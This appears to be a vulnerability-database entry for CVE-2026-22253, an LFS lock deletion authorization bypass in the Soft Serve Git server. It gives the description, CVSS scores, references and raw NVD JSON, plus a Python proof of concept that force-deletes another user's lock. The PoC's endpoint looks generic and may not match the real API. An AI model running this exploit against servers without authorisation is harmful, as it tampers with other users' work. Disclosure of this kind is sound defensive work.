CVE-2026-22253

Description

Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:* - VULNERABLE

soft-serve < 0.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-22253 PoC - LFS Lock Deletion Authorization Bypass
# Target: Soft Serve Git Server < 0.11.2
# Attack: Authenticated user can delete locks owned by other users

TARGET_URL = "http://target-server.com"
API_TOKEN = "your-authenticated-user-token"
TARGET_REPO = "vulnerable-repo"
TARGET_LOCK_ID = 123  # Lock ID owned by another user

def delete_lfs_lock_with_force():
    """
    Exploit the authorization bypass in LFS lock deletion endpoint.
    The vulnerable code processes force deletions before validating ownership.
    """
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Vulnerable request: force=true bypasses ownership check
    payload = {
        "force": True  # This flag triggers the vulnerability
    }
    
    url = f"{TARGET_URL}/api/v1/repos/{TARGET_REPO}/lfs/locks/{TARGET_LOCK_ID}"
    
    print(f"[*] Sending malicious lock deletion request to: {url}")
    print(f"[*] Target lock ID: {TARGET_LOCK_ID}")
    print(f"[*] Force flag: {payload['force']}")
    
    response = requests.delete(url, json=payload, headers=headers)
    
    if response.status_code == 200 or response.status_code == 204:
        print("[+] VULNERABLE: Lock deleted successfully via authorization bypass!")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False

if __name__ == "__main__":
    delete_lfs_lock_with_force()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22253
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22253
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22253/
[4] VulDB https://vuldb.com/cve/CVE-2026-22253
[5] https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42
[6] https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22253", "sourceIdentifier": "[email protected]", "published": "2026-01-08T19:15:59.950", "lastModified": "2026-02-02T17:09:22.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Antes de la versión 0.11.2, una omisión de autorización en el endpoint de eliminación de bloqueos LFS permite a cualquier usuario autenticado con acceso de escritura al repositorio eliminar bloqueos propiedad de otros usuarios al establecer la bandera de forzado. La ruta de código vulnerable procesa las eliminaciones forzadas antes de recuperar el contexto del usuario, omitiendo completamente la validación de propiedad. Este problema ha sido parcheado en la versión 0.11.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.11.2", "matchCriteriaId": "4E11AA52-59BD-42E8-AF0F-EF9490942F6C"}]}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}